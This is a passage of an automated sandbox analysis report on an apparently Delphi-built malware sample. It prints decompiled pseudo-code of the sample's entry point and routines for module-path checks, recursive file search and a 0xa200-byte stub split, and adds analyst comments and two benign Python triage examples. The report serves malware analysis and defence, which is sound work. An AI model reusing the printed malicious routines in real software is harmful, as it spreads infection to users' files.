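    return out_range, calls, status


# Constructed sample: three committed blocks; the request straddles the first two.
SAMPLE_BLOCKS = [(0x00640000, 0x2000), (0x00642000, 0x3000), (0x00700000, 0x1000)]


def demo(fail_at=None):
    """Run the walk over SAMPLE_BLOCKS; fail_at simulates VirtualFree failing
    for the call that starts at that address."""
    def fake_virtual_free(addr, length, flags):
        assert flags == MEM_DECOMMIT
        return addr != fail_at
    return decommit_overlapping(0x00640100, 0x3F00, SAMPLE_BLOCKS, fake_virtual_free)


if __name__ == "__main__":
    out_range, calls, status = demo()
    print(f"window={out_range[0]:#x}+{out_range[1]:#x} calls={[(hex(a), hex(n)) for a, n in calls]} status={status}")
```

Note that the first block (0x640000, 0x2000) is only partially released: its first page lies below the rounded-up start and is left committed, exactly as the clamp in the decompile dictates; a request smaller than a page produces an empty window and no VirtualFree call at all.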

                                                                          C-Code - Quality: 31%
			E004070DC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407126); // try/finally frame installed through fs:[0] (the fs:[eax] idiom is the Delphi prologue); 0x407126 is the frame's handler address
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004049D0(0, __ebx,  &_v8, __edi, __esi); // executed; _v8 receives a string, the API ID of this function (FileModuleName) points to GetModuleFileName
				E00404C78(E0040340C(_v8), __ebx, 0xa200, 0x40a698, __edi, __esi); // executed; the string (converted by E0040340C) is processed together with the constant 0xa200 (41,472 bytes)
				_pop(_t19);
				 *[fs:eax] = _t19; // unwind the SEH frame
				_push(E0040712D);
				return E00403094( &_v8); // finally: release _v8, continue at 0x40712d
			}

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileModuleName
                                                                          • String ID: MZP
                                                                          • API String ID: 514040917-2889622443
                                                                          • Opcode ID: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                          • Instruction ID: dbacf8f9bda0d2f3624fed2e55e69454661720eb62c3ca271fb24a4619442e3b
                                                                          • Opcode Fuzzy Hash: 2f22c95ce754a069faf3e5d71a99af3f29d8e87556c895829c3b73c460f21ff1
                                                                          • Instruction Fuzzy Hash: 32E09270708304AFE701EB72DC13A19B7ACD78A704FA24877E600AA6D1DA7DAE118519
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
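Two things in this report are concrete enough to turn into a triage check: E004070DC and the entry point both fetch the running module's own path, the entry point only calls E00407678 when a value derived from that path exceeds 0xa200 (41,472), and the String ID attached to E004070DC is "MZP", the marker Delphi writes at offset 0 of its executables. The following is an added example, not code from the report or from the sample: a Python routine that splits a file at the 0xa200 boundary and tests whether what follows is itself a PE image. That a complete host program sits after the first 0xa200 bytes is an assumption of the example, not something the report states; the code verifies it (MZ header, e_lfanew in bounds, PE\0\0 signature) rather than relying on it, and the sample bytes it runs on are constructed inline.

```python
# Added example (not from the report): triage check built around the 0xa200
# threshold and the "MZP" marker visible in the decompile.  Whether a host
# executable follows the first 0xa200 bytes is an ASSUMPTION that the code
# tests for; the input below is constructed, not taken from the sample.
import struct

STUB_SIZE = 0xA200   # the constant the entry point compares against (41,472 bytes)


def split_at_stub(data: bytes, stub_size: int = STUB_SIZE):
    """Return (stub, trailer).  trailer is None when the file is not larger
    than stub_size, which is exactly the case the entry point's check skips."""
    if len(data) <= stub_size:
        return data, None
    return data[:stub_size], data[stub_size:]


def looks_like_pe(blob: bytes) -> bool:
    """Minimal PE sanity check: MZ header, e_lfanew in bounds, PE\\0\\0 there."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(data: bytes) -> dict:
    """Report the facts an analyst wants before carving anything."""
    stub, trailer = split_at_stub(data)
    return {
        "stub_is_delphi_mzp": stub[:3] == b"MZP",       # String ID "MZP" above
        "larger_than_stub": trailer is not None,         # the "> 0xa200" branch
        "trailer_is_pe": trailer is not None and looks_like_pe(trailer),
        "trailer_size": 0 if trailer is None else len(trailer),
    }


def _fake_pe(tag: bytes, delphi: bool = False) -> bytes:
    """Constructed MZ/PE-shaped blob (0x80 header bytes + tag) for the demo."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    if delphi:
        hdr[2:3] = b"P"                                 # "MZ" + 'P' = "MZP"
    struct.pack_into("<I", hdr, 0x3C, 0x40)             # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr) + tag


def build_sample() -> bytes:
    """Constructed layout: a 0xa200-byte Delphi-marked stub followed by a host."""
    stub = _fake_pe(b"", delphi=True).ljust(STUB_SIZE, b"\0")
    return stub + _fake_pe(b"HOST-PROGRAM")


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage(_fake_pe(b"")))        # a file no larger than the stub
```

On a real file the interesting outcome is a negative one: if the trailer does not pass looks_like_pe, the layout assumption is wrong for that sample and the bytes after 0xa200 must be examined before anything is written to disk as a recovered host.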

                                                                          C-Code - Quality: 100%
			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed; handle passed in eax
				return _t4 & 0xffffff00 | _t4 != 0x00000000; // Boolean in al: CloseHandle succeeded (non-zero)
			}

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00404CD0,00000000,00404CE6), ref: 00404B91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
                                                                          • Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 52%
			E00407678(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v40254;
				char _v41488;
				char _v41492;
				char _v41496;
				intOrPtr _v41500;
				char _v41504;
				char _v41508;
				char _v41512;
				char _v41516;
				intOrPtr _v41520;
				char _v41524;
				char _v41528;
				char _v41532;
				char _v41536;
				void* _t49;
				void* _t101;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;

				_t100 = __ebx;
				_t137 = _t138;
				_t101 = 0x144b;
				do { // frame setup: 0x144b pairs of 4-byte pushes reserve and zero the ~41 KB of locals, touching every new stack page on the way down
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t139 = _t101;
				} while (_t101 != 0);
				_push(_t101);
				_push(_t137);
				_push(0x40798c); // outermost try/finally frame via fs:[0]; 0x40798c is the frame's handler address
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41492, __ebx, _t101);
				_push( &_v41492);
				E004031F4( &_v41496, 9, 0x4091b4); // 9-byte string constant at 0x4091b4, prepared in _entry_
				_pop(_t49);
				E00403214(_t49, _v41496);
				E00404DE0(_v41492, __ebx); // executed
				E00405008( &_v41504, __ebx, 9);
				_push(_v41504);
				E004031F4( &_v41508, 9, 0x4091b4);
				_push(_v41508);
				E004031F4( &_v41512, 3, 0x4091dc); // 3-byte string constant at 0x4091dc, prepared in _entry_
				_push(_v41512);
				E004032CC();
				E00405200(_v41500, __ebx, __esi, _t139); // executed
				E004049D0(0, _t100,  &_v41516, __edi, __esi); // _v41516: the same module-path string E004070DC and _entry_ obtain
				_v8 = E00405B60(_v41516,  &_v41516); // _v8 is derived from that path and used by E0040597C/E00405988/E00405BE8 below
				_push(_t137);
				_push(0x40789f); // second (nested) try/finally frame; handler address 0x40789f
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41524, _t100, 3);
				_push(_v41524);
				E004031F4( &_v41528, 9, 0x4091b4);
				_push(_v41528);
				E004049D0(0, _t100,  &_v41536, __edi, __esi);
				E00404ED0(_v41536,  &_v41532);
				_push(_v41532);
				E004032CC();
				_v12 = E00405B24(_v41520, 0x40000103); // _v12 is created from the string assembled above and released in the finalizer
				_push(_t137);
				_push(0x407882); // innermost try/finally frame; handler address 0x407882
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E0040597C(_v8);
				E00405974();
				E00405988(_v8);
				E0040254C( &_v40254, 4,  &_v16);
				E00407080( &_v41488, _v16, 0x3e8);
				E0040598C(_v12);
				E00405974();
				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8); // length argument: E0040597C(_v8) less 0x14400 (82,944 = 2 * 0xa200)
				_pop(_t133);
				 *[fs:eax] = _t133; // unwind the SEH chain
				_push(E00407889);
				return E00404520(_v12); // finally: release _v12, continue at 0x407889
			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                          • Instruction ID: bad4d56910de55197467fd61e6ec6c56c875cf63360af75c5594bc2395637eb8
                                                                          • Opcode Fuzzy Hash: e2ffbce9ad41ee186f7f6225872613ed6a0bd1f14c14150b1f77e3a925856f57
                                                                          • Instruction Fuzzy Hash: 42514170B002199BDF10EB69CC51A9DB7B5EB46308F1084FAA404772D1DA3DAF458E5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x408054); // start-up call taking the table at 0x408054
				_push(_t79);
				_push(0x408220); // top-level try/finally frame via fs:[0]; 0x408220 is the frame's handler address
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E00407080(0x4091a8, 0xb, 0xb); // E00407080 is run over each string constant with its length (11, 9, 3, 3 bytes) before E00407678 uses them
				E00407080(0x4091b4, 9, 9);
				E00407080(0x4091c0, 3, 3);
				E00407080(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E00407080(_t26, 0xb, 0xb); // executed
				E004070DC(__ebx, __edi, __esi, _t81); // executed; the module-path routine that works with the 0xa200 constant
				E004049D0(0, __ebx,  &_v24, __edi, __esi); // _v24: the module-path string (same helper as in E004070DC, whose API ID is FileModuleName)
				if(E00404F6C(_v24) > 0xa200) { // E00407678 runs only when the value E00404F6C derives from that path exceeds 0xa200 (41,472)
					E00407678(_t54, _t75, _t76); // executed
				}
				E00407E90(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E00407080(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
                                                                          				if(_t36 != 0) {
                                                                          					E004049D0(0, _t54,  &_v28, _t75, _t76);
                                                                          					_push(_v28);
                                                                          					_t60 = 3;
                                                                          					E004031F4( &_v32, 3, 0x4091c4);
                                                                          					_t70 = _v32;
                                                                          					_pop(_t47);
                                                                          					_t48 = E00406FE4(_t47, _t54, _v32, _t83);
                                                                          					_t84 = _t48;
                                                                          					if(_t48 != 0) {
                                                                          						_t70 =  &_v36;
                                                                          						E004049D0(1, _t54,  &_v36, _t75, _t76);
                                                                          						E00407D9C(_v36, _t54,  &_v36, _t75, _t76); // executed
                                                                          					}
                                                                          				}
                                                                          				E004079A0(_t54, _t75, _t76, _t84); // executed
                                                                          				E0040759C(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
                                                                          				_pop(_t71);
                                                                          				 *[fs:eax] = _t71;
                                                                          				_push(0x408227);
                                                                          				return E004030B8( &_v36, 4);
                                                                          			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindModule$CloseFirstHandleName
                                                                          • String ID:
                                                                          • API String ID: 2572062711-0
                                                                          • Opcode ID: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                          • Instruction ID: ce7274d5a0203330cd45a7cf6d0e011d083bf460e717dce8afa0a39e5ced3773
                                                                          • Opcode Fuzzy Hash: 6d70fba820807f475e386924a9e2af15878d2dd69a0bc15187a92624e301fe42
                                                                          • Instruction Fuzzy Hash: D4211E70B142054BEB40B7B6C95279F76A5DB88304F50493FE544BB3C2DA3DAD0586AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 60%
                                                                          			E004074B4(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                          				intOrPtr _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				char _v24;
                                                                          				char _v28;
                                                                          				void* _t34;
                                                                          				intOrPtr _t62;
                                                                          				void* _t71;
                                                                          				void* _t72;
                                                                          				void* _t74;
                                                                          				intOrPtr _t77;
                                                                          
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_v8 = __eax;
                                                                          				E004033FC(_v8);
                                                                          				_push(_t77);
                                                                          				_push(0x40758b);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t77;
                                                                          				E004031F4( &_v12, 3, 0x4091dc);
                                                                          				_t49 = E004052AC(_v8, 0, _v12);
                                                                          				_t71 = E0040532C(_t25) - 1;
                                                                          				if(_t71 >= 0) {
                                                                          					_t72 = _t71 + 1;
                                                                          					_t74 = 0;
                                                                          					do {
                                                                          						_t34 = E0040534C(_t49, _t74);
                                                                          						_t81 = _t34;
                                                                          						if(_t34 == 0) {
                                                                          							E00405338(_t49,  &_v28, _t74);
                                                                          							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                          							E004071D0(_v24, _t49, _t72, _t74); // executed
                                                                          						} else {
                                                                          							E00405338(_t49,  &_v20, _t74);
                                                                          							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
                                                                          							E004074B4(_v16, _t49, _t72, _t74, _t81, _a4); // executed
                                                                          						}
                                                                          						_t74 = _t74 + 1;
                                                                          						_t72 = _t72 - 1;
                                                                          					} while (_t72 != 0);
                                                                          				}
                                                                          				E00404520(_t49);
                                                                          				_pop(_t62);
                                                                          				 *[fs:eax] = _t62;
                                                                          				_push(E00407592);
                                                                          				return E004030B8( &_v28, 6);
                                                                          			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction ID: 101897594dce54360dc52a275b3a014dbc9cabf376d6d76c5a5bbcf91f550c41
                                                                          • Opcode Fuzzy Hash: fd7c348ce77f50c17542cebb3b0538e5ca6a1de9245a361f45dd7a6b294aa538
                                                                          • Instruction Fuzzy Hash: 53218830B045096FCB04EF65CC8299F77A9EB84304B60447FB801B77C2DA78EE058B55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E00404DE0(char __eax, signed int __ebx) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				void* _v16;
                                                                          				char _v20;
                                                                          				void* _t45;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr _t64;
                                                                          				void* _t65;
                                                                          				void* _t68;
                                                                          
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(0);
                                                                          				_push(__ebx);
                                                                          				_v8 = __eax;
                                                                          				E004033FC(_v8);
                                                                          				_push(_t64);
                                                                          				_push(0x404e9f);
                                                                          				_push( *[fs:eax]);
                                                                          				 *[fs:eax] = _t64;
                                                                          				_t65 = E0040320C(_v8);
                                                                          				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
                                                                          				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
                                                                          					E00404DCC(_v8,  &_v12);
                                                                          					E0040312C( &_v8, _v12);
                                                                          					if(E0040320C(_v8) >= 3) {
                                                                          						_t68 = E00404CF8(_v8);
                                                                          						if(_t68 == 0) {
                                                                          							E00404EEC( &_v16);
                                                                          							E00403358(_v16, _v8);
                                                                          							if(_t68 != 0) {
                                                                          								E00404EEC( &_v20);
                                                                          								_t45 = E00404DE0(_v20, _t49); // executed
                                                                          								if(_t45 == 0 || E00404EB0(_v8) == 0) {
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				_pop(_t55);
                                                                          				 *[fs:eax] = _t55;
                                                                          				_push(E00404EA6);
                                                                          				return E004030B8( &_v20, 4);
                                                                          			}

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                          • Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
                                                                          • Opcode Fuzzy Hash: 60dcf029e418bb4de6c98b25837b89894300ef75002f4660ff180e9b0e990edb
                                                                          • Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
			E00406E94(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0; // Delphi try/finally prologue: links a new SEH frame (handler 0x406f22) into fs:[0]
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed; per this record's API ID (AttributesFile) the path reaches GetFileAttributes
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f30]"); // x87 compare of the value returned in ST(0) against the constant at 0x406f30
					asm("fnstsw ax");
					asm("sahf"); // copies the x87 status word into EFLAGS; the branch that consumes it is not in the decompiled output
				}
				_pop(_t40);
				 *[fs:eax] = _t40; // unlink the exception frame (try/finally epilogue)
				_push(E00406F29);
				return E004030B8( &_v20, 2); // finally block: cleanup of the two locals at _v20/_v16
			}
Instruction addresses for E00406E94 (address column of the listing): 0x00406e9a 0x00406e9d 0x00406ea0 0x00406ea5 0x00406ea6 0x00406eab 0x00406eae 0x00406eb6 0x00406ebe 0x00406ecc 0x00406ed4 0x00406ed5 0x00406eea 0x00406ef1 0x00406ef3 0x00406efb 0x00406f01 0x00406f03 0x00406f04 0x00406f09 0x00406f0c 0x00406f0f 0x00406f21

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalPathTempTime
                                                                          • String ID:
                                                                          • API String ID: 2118298429-0
                                                                          • Opcode ID: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                          • Instruction ID: 68f96da1d51e9565b10b5108b435a8bc67f0bfec9723d228dfcbae9d3fbb17ab
                                                                          • Opcode Fuzzy Hash: be31c71bef31dcf0d495f0e1e2d88fef08ea193925f7f09ef08642d0a6e869a3
                                                                          • Instruction Fuzzy Hash: 4A0175709042099FDB00EFA5DC5159FB7BDFB45300F52857BE414F36C5DB38AA148A69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004052AC(void* __eax, void* __ecx, void* __edx) {
                                                                          				void* __esi;
                                                                          				void* _t7;
                                                                          				intOrPtr _t11;
                                                                          				void* _t14;
                                                                          
                                                                          				_t14 = __eax;
                                                                          				_t11 =  *0x40447c; // 0x404488
                                                                          				_t7 = E004044F8(_t11, 0);
                                                                          				E00405634(_t7, __edx, _t14, _t14, 0, __ecx); // executed
                                                                          				return _t7;
                                                                          			}
Instruction addresses for E004052AC (address column of the listing): 0x004052b4 0x004052b6 0x004052c3 0x004052cc 0x004052d7

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstNext
                                                                          • String ID:
                                                                          • API String ID: 1690352074-0
                                                                          • Opcode ID: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction ID: b59b8e1bf290491f0b5bd01f3f1f1884d5f58955f35eb0aac9512fedb03d6d3a
                                                                          • Opcode Fuzzy Hash: 4f493d9307b3d4b817a7e836544abeb962cbb198da26cb643227803e88156b29
                                                                          • Instruction Fuzzy Hash: 70D0A76230111417870065BF2C84C2BF3CDCBCD565391413AB208D7341DD35AC0742B8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
			E00402448(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x409030(); // executed; indirect call through a function pointer stored in the writable data region at 0x409030 (the 00409000 dump is PAGE_READWRITE)
					_t6 = _t3;
					if(_t6 == 0) {
						E00402530(1); // failure path taken when the called routine returns 0
					}
				}
				return _t6;
			}
Instruction addresses for E00402448 (address column of the listing): 0x0040244b 0x00402462 0x0040244d 0x0040244d 0x00402453 0x00402457 0x0040245b 0x0040245b 0x00402457 0x00402467

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction ID: d53205a698bee5913c9905fe3b2fa7a5b2040cee35667c8cc0b5dc0e3ef69e66
                                                                          • Opcode Fuzzy Hash: 8dfeac06a829af607fe89a8817dc8f9230199d36438cef303ac21605a03e7c3b
                                                                          • Instruction Fuzzy Hash: 6AC08C6030270387DB202AFA1FDC113125C3F24205300403BA901F13D3EAF8CD089A2F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00406510(void* __eax, void* __edx) {
                                                                          				void* _t3;
                                                                          				void* _t4;
                                                                          				void* _t8;
                                                                          				void* _t9;
                                                                          				intOrPtr* _t10;
                                                                          
                                                                          				_t3 = E00406B48(_t10, _t4, __edx, 0, _t8, _t9); // executed
                                                                          				return _t3;
                                                                          			}
Instruction addresses for E00406510 (address column of the listing): 0x00406517 0x0040651d

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: IconInfo
                                                                          • String ID:
                                                                          • API String ID: 2096194817-0
                                                                          • Opcode ID: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction ID: 2c83cf8f1268621ffc1ea80895ab672af1bae2362a1aae74aa6b220125402c61
                                                                          • Opcode Fuzzy Hash: 3aa0d1c17f7541c88f4a23eede43810dced38d8a94ff8caad404287aac718eb2
                                                                          • Instruction Fuzzy Hash: 92A002C6751214079B4CE53F1C6292A729F07C8615759C87A7906DA289CD38E8512155
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          APIs
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
